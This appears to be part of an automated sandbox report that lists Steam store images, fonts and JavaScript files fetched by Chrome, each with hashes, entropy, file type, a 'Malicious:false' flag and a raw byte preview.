        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.............V.W....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...K.Q....AI.Ue.n.E."..'...M..u......(!.,.(..A-..DlWbQ...\Klf\dw....{~|..3W.X......,7.6.V...A..YCm...+.............O..6>.~..M.~.6..l..o[.y.4B.$.F_/Z.. ..X.;.>6.Os+.q6bZ..b...(.....2L.x^b'....?.....g..XAA.d..z..M..p.c|...W<]2DS. .-+.y...;p1.on..."}q.RU..2..W)*..'....ZW..h..@.....Y.E7D.|...k...f..,r.:...8.f..m#3%...#Y.NW`.!Y.....s.?.......)Gj..L../.7..Z.V.!....1N...P.|.]....,..5....R..a.N..E.U....#....5_l.$..........$......IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:SVG Scalable Vector Graphics image
        Category:downloaded
        Size (bytes):5469
        Entropy (8bit):6.064363147987587
        Encrypted:false
        SSDEEP:96:AvfYSFKIMSxjU72WVBsmGLY0b/Ozwwz5uKIMSxjU72WVBpeIXIoss:kYS0IOahh9b/Ozwwz7IOaEeq
        MD5:4F0CE612F218FF67BEC38F2FF9123DFA
        SHA1:6211B1146EFE003E6271E15FD4FF5B61FE809045
        SHA-256:862887D7615B9E80A05E057A455D0BC37193220E2C608E3258E9986883C8077F
        SHA-512:B755780F7C837394802276B875ABD607CE60CA6B97631DC1DB370BD1DF5A85ED043D0A130FE8870C7AE28CBFB004D5C52C1D045FCC7DC511B46565172F478FB6
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/images/icon_report.svg
        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 24.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" style="enable-background:new 0 0 16 16;" xml:space="preserve">..<style type="text/css">....st0{display:none;}....st1{display:inline;fill:#67C1F5;}....st2{fill:#67C1F5;}..</style>..<g id="Layer_2" class="st0">.......<image style="display:inline;overflow:visible;" width="16" height="16" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ..bWFnZVJlYWR5ccllPAAAAyZpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdp..bj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6..eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMTQ1IDc5LjE2..MzQ5OSwgMjAxOC8wOC8xMy0xNjo0MDoyMiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJo..dHRwOi8vd3d3LnczLm
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 616x353, components 3
        Category:dropped
        Size (bytes):43109
        Entropy (8bit):7.9723532246810915
        Encrypted:false
        SSDEEP:768:+pimLkMMgrhye/+NN2iu5KGp9wXuc/4eiyrpUW7Ga:+pimkmh9/+Y5z9wXuc/li25x
        MD5:84DE3D084C80944273EB22B46E79F375
        SHA1:C81DA12102C514A298AF2C15CA05EEFCC33CE6D1
        SHA-256:80F97A0EF53385795BF5EDBC06F6DFBC47516AC1216013594D484B4EA7D1088C
        SHA-512:B0255C12F4E800276EFCC426EF229A4EF8055AA3A34D1FAE1639A9A15312237291E06071E698627245572D30DAD889DDF1E04BBB9BD3169D68FC0B5E55F1243F
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................a.h............................................L........................!1AQa..."q.2...#B......Rbr..3..$4CSs.Dc....%..5t........................................................!.1.A."Qaq2B....3R#...............?..}..g..?>u.y...5...Q&$.$.^.@..}A.h..M..%Wc...b..:..;..h..hx.............h<.*.M.0.[.!BN^'.`..A...8...,.......(....:.."".b"./...?..V.$.._.D...=...#.....`N....V1.t;...@.....j.F....(...8."..h...sPld...mt..G%.(......Z.Kl.B......W.n.......H=c..N...n\v.FP.....3.W..,rB.9x}.EQ(...k.g.zT.a^s.&|.D.A.p.RL..PL...*...Z....6...X....;...B.....|0..s.a.....#.uV.6S......5.N.f.l.a......:.}y|.X.Li@..\...Z.&?sZ.$.9~.....Q.....x.-...c.u.(....iw*5..*......eb.7..C.$Pr.d>....B..;O..#...n.YR.)+.Z#w.m.;.....@..U.k.Q.q.Z....2.p.CTA40v#.X...!N....1X.b(*...,..>T:.SU}...\..T2.,....*".tZ......'2...B..-.x8.....x.JH!sG
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 32x32, components 3
        Category:downloaded
        Size (bytes):1963
        Entropy (8bit):7.745285552130413
        Encrypted:false
        SSDEEP:24:O8zo0XxDuLHeOWXG4OZ7DAJuLHenX3yCUKGOmSG2qIwZhcC+k2iPQK8UEtfvjliL:guERAoEGOi2quC+krwfLsk6pqi90gV+E
        MD5:B4AAC940C33C90BE09D2CCF69E540A6D
        SHA1:A58740BDF4BEB5714D8093CB965B49D3EF248F04
        SHA-256:D289D8A021768BBA3D9491146437434CD80282628D8FB4ABEEA8F0588037BECA
        SHA-512:E56C56F2ABBF10A4189AD2B8326338CB4FD8E1CC22B47BCF96FB223721A7CF10DFA3F196A596C3F5CE5934AEEA973A420057F7042FB2FC237B4DEF0D1FC3086D
        Malicious:false
        Reputation:low
        URL:https://cdn.akamai.steamstatic.com/steamcommunity/public/images/apps/1643320/a58740bdf4beb5714d8093cb965b49d3ef248f04.jpg
        Preview:......JFIF.....&.&.....C....................................................................C....................................................................... . ...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....q..-.#iQx...hR1.Vv..{..a.2V<.&...AP...E....<..~.|M.....N..mf..+...i,~9.I.v).+;;...+I....'.R..M.]x.F..<9...r..0G.r..C..2.P....s+..RX.D.RI%.6...5.~.Y....IQ.iB4...J)...{..?.~'....-.3.lu..W&t.#..+.M..C.j.A...Mk..r.<^..T[[..^.:^Kf..C7....^*jO.j....]5-tw8....\...qay..\...Y...c.,Q.U6.l..M.........(y.H.K...Ki5v..]..7..D.c.8C.&...I^....7.k....-Y...\.F.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 152 x 71, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):4512
        Entropy (8bit):7.415680848996788
        Encrypted:false
        SSDEEP:96:2SZYkknmWq2Yf/LVHnLdHYqbJL5gWfVrCCdT/7PT8IQN:2SikknoHBpbflxF/7r81N
        MD5:6B1FEDCD10C0AC040DDC4053BF32B691
        SHA1:75B7C40D3AE5772E3A8AE13BD0558FB4F9B760E4
        SHA-256:8C91B7DA40C2E5FA677A05A0E9E38F2E272E618A641CF2525007467D69534026
        SHA-512:0BDD02B539CE195BB2E7A5A3BFD611569E7D281C8944747F391998DFECE92F0115D6A363817D09AC38B343D48B3D5D1D09A845A328D199B9F5AD1F8A33C3274F
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/home/logo_steam_piston.png
        Preview:.PNG........IHDR.......G.............pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmp:CreateDate="2020-06-17T17:23:07-07:00" xmp:ModifyDate="2020-06-17T17:25:21-07:00" xmp:MetadataDate="2020-06-17T17:25:21-07:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:56d15902-83e7-0f45-b87f-50e9408da383" xmpMM:Document
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 292x136, components 3
        Category:downloaded
        Size (bytes):19030
        Entropy (8bit):7.968402945505378
        Encrypted:false
        SSDEEP:384:j6yC+0AgvGRXau/+OVMIa7XYddtIRVa5qK8w4tnBaWpt/ys:j6yC+PgvGR5/fV5ajYddtIHa5qlwEaWT
        MD5:40A3591062B747102C42872E5CF57595
        SHA1:153AC7A2207D209E5CE6BC8A63AF838FBD173D89
        SHA-256:BC3A5658ED775472C94EF92EAEB34DC11B36AE2B2AC74886AF108C51460C75B8
        SHA-512:E7DD421ACC51E314E13ADFC3291BC0109F3667BCCF4360CD81EF09C3426641CBC8FDDC8CCBC4960137A803716AFFD48DE5B34D7A0F786E6518D94D601C2F9C2B
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2881650/header_292x136.jpg?t=1715689548
        Preview:......JFIF.....,.,.....C....................................................................C.........................................................................$............................................I..........................!.1..AQ."a.2q...#BR.....3CSbr..$%....(4e......................................>........................!1A...Qaq...."....23r..$BRb......#C.............?....G....n>...Y.H..Ho.....bo......h.X..H..+.....$.........xI;N.....8I ........c0a..6\Y,...8....n..zy..._NN7Q\.M.....0.wo...S....I....S..v..'?.o......BXH.~..K.t..Q.rI.c.`...>cXT.yKf.......1.1..EE%(...!%.[......b...*..YX+...<.....(*.z.u....c....V...>]."@;X1....HdG.._b./..\..D..P......0.RL.R..w..... ......*.6u@...kr0*.p...K....<.]~^.........F_<RfU?....("K]..rE.~#...sJ...3."./......V.....4..h..4..T..i.y.Z.}............s.55].:yA&k..E..... *}Q.c_.W.y..2vnZ...}...A....1T.RV.C...M......aOp.L.Av...7...|..\..Ack3.?...S.%=.$.....v..C[..........&-.g......+%.].gy.B.<.....W....i%z..U.0p.-...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6081
        Entropy (8bit):7.914765182563518
        Encrypted:false
        SSDEEP:96:DNlhrwaQujhPBjQwjU6pNrAxy07TeohrV2dhUsxZAKlgdfeiCjl6fP7/0jq/:Bl9w2jhPBjQSU6/Qy0nhro1vA6gEIfPR
        MD5:14404A67A4A0FF17B73F8FA05193BBA4
        SHA1:D447EB1E4247124AECEA049F92C414DE3922B5E5
        SHA-256:3C4190F10B94E8B1CE7014004F5CE8AA29CA0F3A4C26261D41AF714C3B03139F
        SHA-512:7220C48D3863113CDCC076365648B0016067E160674F9622B8EA8E9B9F1E9C6999C7ECCFDF053D2EAA5011B425BE2E0E0C212F1AA2ED220B087618B25796A477
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E..............................................F..........................!.1AQ.."a...#2Bq..Rb...$34CS.....5Dc......................................-........................!1A.a."2Qq....#...............?..t...X..m.=.8.L}.4"..'U......-..'P.......B..*....q..C.U....$.uicE..b(m..J.%..).q....9bEc.Z...[.6=w..+...0E..........l>.....|..G.....V....0..q.[=f.....}..5.R+.^u..X('.*]..)(R....lj...O&o.....Jj..2o.h...g4. e........-..F.....8...'b..v......w.n..o.....j..#......U..<Z..I-.Y....B..y..j..(I7=.ltt?..k&.TW./..d._.......KL..[.2..TjR]2*U.f.*.U..Y=..@|............J.p......7B.1..`..K..H.....8.....M....,..iM....q.Sj.IIB..k \....w.F3....+.........]1..7..`1.vX..%./T^.k.....m..\.....?.iVG%..~...lK&v.\U.6.?.|U.!O.!C.<...M.[d.J...v.S.....z7.vBX...}{......A.#.6..Pm....J#....`l.`..?..^.G..UIv......=<...:BH*;m|z[(..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):72607
        Entropy (8bit):7.981691955442756
        Encrypted:false
        SSDEEP:1536:Sdv8ydupaM4t+pDGUBOMemCTfGQlzLAaJh5tpyn8PVwIbkR:Aug0GUkHfGQlzLAaJb5PGgw
        MD5:941C4FDAC65A27040E45E02009DD3256
        SHA1:5DC986A0045B95A0BBFF5029A4C8F22ADD5F9EDA
        SHA-256:5775220B6CED6F19D9DD2BCE22A38EDC61DB3DAA8DE59E6F3ACF80C15C59044B
        SHA-512:407F273981E45D7A9045183EB0D3F245D765456817ED510ED87E38712F8D974BB19AC41B9C40A9D29120EF1EBE5572F4FF99AD592FA913485EE41FEA8A5D4D4C
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1245620/ss_cb9445da232527daf9b7d1d2fcc60fe213f0d7ba.600x338.jpg
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X...........................................L.........................!1A.."Qaq.2......#B...3R..$4br5Cs....%Dt.....67S................................5......................!.1A.Q."a.2q.........#B.3Rb.r............?..bV.....>.D.M.y.....X.$.3..h..pl...]5....m..]lT.b.FQ#G.!........5.....q~K....t......i.N.cm.Wa..(..Bn._..[.H........L.....<^.kBz.I$.li. .).$.b.%.R.0}..,..C...c,.B.H.s=+..:.mJ|......T.O.......Jg.......k.p:.nv..1..8*U....}MX.....)3...,...8..Z..R.n..I......N\..,..U.._.....p.\..G.V?h..h..tI.d...5...Y..W.m...91|(..v...o...~..;u$tX.#..t.SH....I^..H7..-m.;.<.....|...1...t!..1....PJ.....O._...SrM...4'.......$...2._.Y..C.$.".Jz.....o.Qz.j<S.......%......O.A[.[.m}.......w...~.?..._...z.$#jOC..h...=.uh..........#pGC.>u..O...l......3...0.L&../.X....p..I..;...N....iV._}.q....o.=U....D.Q...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (536), with CRLF line terminators
        Category:downloaded
        Size (bytes):91314
        Entropy (8bit):5.458452764787604
        Encrypted:false
        SSDEEP:1536:qOpYuxcDhBWz6RcaNr73z5N8AuYxKNM2EVshJQIxr8KvPQDsPsddakursRtn0nok:3YjNBWdMDsoojc0rb
        MD5:941CD8832A7C7D4F6E5F517F9BC5BD36
        SHA1:6BEB60CF3D409447D3E37E06F3EFE17E3A2736CA
        SHA-256:BF217DCBBF9D13DD02BB603160C87682AB22880DA11B934D6B72F1717072A201
        SHA-512:2ED773A2C226336FBD6C9D712E6F4E3A9B46B6973C496D46BA229E7F9B8700FCCE4914651A0D931F64A5AE31E73EE6CFD16D616FFF9E8F02386754B8E61688C4
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/main.js?v=lBzYgyp8fU9u&l=russian&_cdn=cloudflare
        Preview:..function GotFlashPopup()..{...var win = window.open( 'https://store.steampowered.com/gotflash','gotflash','width=536,height=546,resize=yes,scrollbars=yes');...win.focus();..}....//..// Page-able tabs..//..var tabStart = { };..var tabMax = { };..var tabTransition = { };..function PageTab( tab, delta, max, params )..{...if ( tabTransition[tab] )....return;.....if ( !tabStart[tab] )....tabStart[tab] = 0;...if ( !tabMax[tab] )....tabMax[tab] = 0;.....if ( tabStart[tab] + delta >= max )....return;.....tabStart[tab] += delta;...tabTransition[tab] = true;...if ( tabStart[tab] > tabMax[tab] )...{....if ( !params ).....params = {};....params.tab = tab;....params.start = tabStart[tab];....params.count = delta;....new Ajax.Updater(......'tab_' + tab + '_items',......'https://store.steampowered.com/search/tab',......{ parameters: params, method: 'get', insertion: 'bottom', onComplete: TabCompletionClosure( tab, delta, max ) } );....tabMax[tab] = tabStart[tab];...}...else...{....RollTab( tab, del
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):3141
        Entropy (8bit):7.824996543416103
        Encrypted:false
        SSDEEP:48:v6N3Z8SM3b0q/q6/JzlfRO1E6LsGSNrs2zcGWcjcYrEScc6iALQAu6W5ZV/8I:v8J154v/Jzy1E4sctTQz35ZV/J
        MD5:89A6875B9730A101C689EB140273E189
        SHA1:3ADE5018846736EFF83DB18937FC7852AE387F5A
        SHA-256:ECEADF3706603C124B2F510DB12813B17879C3E75A4C6E16A0F4A9536A9A5960
        SHA-512:95DA7C0213573140082874E32DC5F4614670ECF11FC03B29BD7868C371FC219678B1B65983FFB44D34BD5A22D5D8871065B98353D7EC7B17B4A17AC003026FCA
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................B.........................!.1..A."2Qa..q.Br...#3457bsu..6CGRtv.................................%.....................!1...2AQa.q"B.............?....1...F.Pe.....K.....K....N<..q.I..e.(T..g..........1.G..a&.S..`JSE..Q.I$.*.I?C._f....z...~.*.{..)..Cs...G+...^Lu!.r...%,.UV....qEQ7.b..}.GPT.I/Y...T..#..1.N..(/l.e.m.d;.iY...m.u..E.t.Q.$.#....aq.....y.qt.|.R....Ab[.<.../.ln..........F.......RQ.N...N..H...cG.}...t..b......g^wm\t..uMmT..CO.w..$......z.aK4..l....*...onm.-sY$..-...RC,fU.B.GN9<.>V..R.KiZ6v..T~...6.ZZkD..Y<. .F..8.r:A.....'Z.F).8..5.:....7...c.FH...~.<q..^.....Kh.}..S.....#x......;r;.D.e./.5[...+.E.%M...Z.oZ.L...@ rX.2...F29.*X)F..'.].Q..B....O.....B...l....`G.~Z........T .=. *2t.08..i.z..I.......41#...>.x'...~..n..x...O.^@.-.......M.K..}.6Ue..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansBlack4.015;Plau;MotivaSa
        Category:downloaded
        Size (bytes):120816
        Entropy (8bit):6.070220522864693
        Encrypted:false
        SSDEEP:3072:IrEEEEEueapd0oej1yAHjU/gXG7mGSCfj9:IDpd0oejdQ/gXgfh
        MD5:4F7C668AE0988BF759B831769BFD0335
        SHA1:280A11E29D10BB78D6A5B4A1F512BF3C05836E34
        SHA-256:32D4C8DC451E11DB315D047306FEEA0376FBDC3A77C0AB8F5A8AB154164734D1
        SHA-512:AF959FE2A7D5F186BD79A6B1D02C69F058ECD52E60EBD0EFFA7F23B665A41500732FFA50A6E468A5253BB58644251586AE38EC53E21EAB9140F1CF5FD291F6A5
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Black.ttf?v=4.015
        Preview:........... DSIG............GDEF...4...,...@GPOS..B....l..l.GSUB.d....m.....OS/2w*.'.......`cmap.d..........cvt J......0....fpgm.6!.........gasp.......(....glyf...G.......jhead.g.n.......6hhea.r.....(...$hmtx..*....L....loca.F. ...4....maxp........... nameKN].........post............prep...........................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (377), with CRLF line terminators
        Category:downloaded
        Size (bytes):34674
        Entropy (8bit):5.421358067509858
        Encrypted:false
        SSDEEP:768:ciJQBnCB/MaberYaWM5tWgFPQVGvKMpEFbW:cMQJu/Mabc4MZPPvKzk
        MD5:3F9FAFDC9C0CDDD25D6E4D046A8D42D3
        SHA1:E277FDA3655E94DDB80F03225EFA7EE8EBD6BB30
        SHA-256:A2ADAD654A0E37C791418E897592D6213B0CBEB73B35C1DE6CA82085C4E79CE9
        SHA-512:012D99F610FBA081390225909D3915361EE5638D71EE507B3D05EB71D05C1489EF1CDC0A39DA1D2D1ADACBDFAC2C279D96EBB47C72273CC2662E06E4378EEBFE
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/javascript/crypto/jsbn.js
        Preview:..// Copyright (c) 2005 Tom Wu..// All Rights Reserved...// See "LICENSE" for details...../*.. * Copyright (c) 2003-2005 Tom Wu.. * All Rights Reserved... *.. * Permission is hereby granted, free of charge, to any person obtaining.. * a copy of this software and associated documentation files (the.. * "Software"), to deal in the Software without restriction, including.. * without limitation the rights to use, copy, modify, merge, publish,.. * distribute, sublicense, and/or sell copies of the Software, and to.. * permit persons to whom the Software is furnished to do so, subject to.. * the following conditions:.. *.. * The above copyright notice and this permission notice shall be.. * included in all copies or substantial portions of the Software... *.. * THE SOFTWARE IS PROVIDED "AS-IS" AND WITHOUT WARRANTY OF ANY KIND, .. * EXPRESS, IMPLIED OR OTHERWISE, INCLUDING WITHOUT LIMITATION, ANY .. * WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. .. *.. * IN NO EVENT SHAL
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6498
        Entropy (8bit):7.920571241657577
        Encrypted:false
        SSDEEP:96:n1qK0mnLvsBqNFLYOHyIwZCfnfmHuEdjDOJVgL53NK/xbwqhqgp7o4rm+pkow:1qKdJNRHmZCGHfFSY3ubnMgJtm+phw
        MD5:F5100E110F7D673CAA7819D4CD60986B
        SHA1:9079A6FACDCE761BDBC73801344179B60BD04D38
        SHA-256:E47500FC3710B8AB505F8F4B71D7601D9E4DAA8496EBC1AE39064D291C62A573
        SHA-512:2C0E84E3B295EEE8D10874360BC92369B9FC1A17F25B54C48F20389C52EC97EA20060358C62F134A229A03577B69AE6EDA87A468559FF78A8694CB65412DDF96
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2519060/capsule_184x69.jpg?t=1716338348
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@..........................!.1.."A.Q..#2aq..B..$4Rs.....6rtu.....................................=.......................!..1AQ."aq.2......#B...34r..$5Rst...............?..}p..IbFG#X.[..e.~....<...k-[.V.efuJb....=*-..V..*?!....8....}...k.z..H.46.\7=.[..A.}.-.F~3a.ZI>....q..n.2..T.6b...EQ..B..^.;7....K.ypNa.s..e%.#..4w+ca@..O.......u.>.N.&...r..B.[..i..QT.AVh...I..^.c......!j.iu...%...gX+`l..9....y...:.I....%......../.H..!-.KB........A...'~I|...`-.&..%`..t.M..M<.Z..Tv.'s*D.K.m.[+.@|.:..*.%.;.....H..\..6.k.9</.o..j...jZ.8.]....Jf.]hHS......I....].N...#...-.f..@.=0.........%+.....+m.....8 ~:rj._......&k.v.|...{P...cE..F.q.....<.;.:8=;.#.@'.V....h.9.`.o..78.U:..`.4..H.T....~.YXH.h..9.S.Qp.+....8*..|..2P.7.:v..y.M(`.n..X.=.,$5...8.X[.e..&.>)}K..j..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 306x260, components 3
        Category:dropped
        Size (bytes):34010
        Entropy (8bit):7.52878300717886
        Encrypted:false
        SSDEEP:768:EMFUWzEjY+38I1s6DYy7kMTBuSQv4F2oNw:EFW0YS1s6DP/luS1VNw
        MD5:D9C80B8CADB05B8DFD42DB5D4B76BE78
        SHA1:874470A1A472969CEDD5E7B02F99CFE9AC8F114D
        SHA-256:9A5907EA3DC2990C1587C2865AC819BA956DF55F0A38CD1DF7AB10232DC6FC14
        SHA-512:8ED3D2F09F9E806DF2D5D27B3B26050BFD398A001D5A75D0A83FB781EAE873605844B7CED7AC68CAB1D8397897EF66CEFC9FFA6A938550FBC1366D683BF8D0AE
        Malicious:false
        Reputation:low
        Preview:......Exif..II*...............4OJP........4Ejumb....jumdc2pa.........8.q.c2pa...4.jumb...Gjumdc2ma.........8.q.urn:uuid:410a9eb3-992b-46c1-8f9b-c5778de0b31d.....jumb...)jumdc2as.........8.q.c2pa.assertions.....jumb...&jumdcbor.........8.q.c2pa.actions.....cbor.gactions..factionkc2pa.editedmsoftwareAgentmAdobe FireflyqdigitalSourceTypexShttp://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia....jumb...(jumdcbor.........8.q.c2pa.hash.data....|cbor.jexclusions..estart..flength.4Qdnamenjumbf manifestcalgfsha256dhashX ?xQ ..R@._uuf.....^..x...v.F.=cpadI.............jumb...$jumdc2cl.........8.q.c2pa.claim.....cbor.hdc:titleoGenerated imageidc:formatjimage/jpegjinstanceIDx(xmp.iid:865973EC115A11EFABA1DA4168878FA9oclaim_generatorx>Adobe_Photoshop/25.6.0 adobe_c2pa/0.7.6-2 c2pa-rs/0.25.2-patchtclaim_generator_info..dnameoAdobe Photoshopgversionf25.6.0.isignaturex.self#jumbf=c2pa.signaturejassertions..curlx'self#jumbf=c2pa.assertions/c2pa.actionsdhashX Ji.....A0x.$.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):72955
        Entropy (8bit):7.972738193465283
        Encrypted:false
        SSDEEP:1536:hU5bxz99VUYs5gCRE1UrAks7vBwij2njCW2ZIREcwdXVq1e:OPPSYs2jeAksA2DZI2jZVqk
        MD5:8913ED0F4051FAAAE14E41AB7FC4D40F
        SHA1:079C03BE40ED3D977719330CEBAF0F376683ED11
        SHA-256:57A2361D69A0C5DD1D61EBCB0A83C131B79A7A6E7C2E838747F7AFA8800E07CC
        SHA-512:DF2FF965C901F794DCF15AA5402198038AA3410780DF33A51C684C9BD09F6105510203FDCB4199AEE0AAFC9903F0E277EFAD208CC9E6264CC5F0C33BCB30574A
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1085660/ss_01fdd090ed1dd70112ce2c6d6fc208df0a008ac7.600x338.jpg
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................Q.X............................................P..........................!1A..Qa"q...2...#BR..3br...$45.....CScs.6....%&Dt...................................:........................!1A.Q."aq.....2...#B..3R...$4CSr............?..}..........q!m".$..Y...Yd..C..@...N)v5 . .zP9..4.l%9.9......O.y.G..-.....e...F.)g..%.!..9....>..UYg...5.E......d.>.E...J1..}.6).8iP..F)o#Do..i..>......p.)..T....c>.jc.*.*.4~ dj...d$..T;./...X.;./..9..}(.Bh....T.:......m...N.v...F.N.u...)....Y....@/.M>,....(s.*.b.@.....#.M:"d.]..9...\:rEy...iaI..t[.."QMS8.....N....3.Ve%>R.U..S.....91.e.l.z\"..,..4......>...>*)4J 9.}.*.......S...QF.q..OC.....4Ch.............g.WQ.|0.....a..:.t5.u.......D......WQ.pb..SGY.1..".v..i....]d@.67Fm1|.^......."....\y.O........Jc...$13...rR.)....6...x...}j".....t..,zn.e{N\..4..L)/[..8p.e
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Unicode text, UTF-8 text, with very long lines (65256), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):187252
        Entropy (8bit):5.053979726725543
        Encrypted:false
        SSDEEP:1536:zyAA36oGqNyyrdiEEUl2SoZsJcl1jnXvQErjituf3FwJzr6oQfVxlSgLOd8vlx+:zJCdizMm1rQErjMuf3FwJzr6oQzEgLH+
        MD5:A6BEDFA73BF233254EF1F7E86FF05CCC
        SHA1:E92927E134B3991855B11CF3C984E3511B2711A1
        SHA-256:2B63497F91270119ADD80D321FD76EBDCEDDAE6C5C035470C9D06B932C888E89
        SHA-512:5CD30262D78EE6C16680C23F4EAB0B1D534E71CC01019DDB71E41262F30B1439A7BCF4D13D0BE51AC79DBA0591FBF7DA2F9EFEE92B61570A842B219C6576C8A4
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/shared_english-json.js?contenthash=638527edc959a2c11248
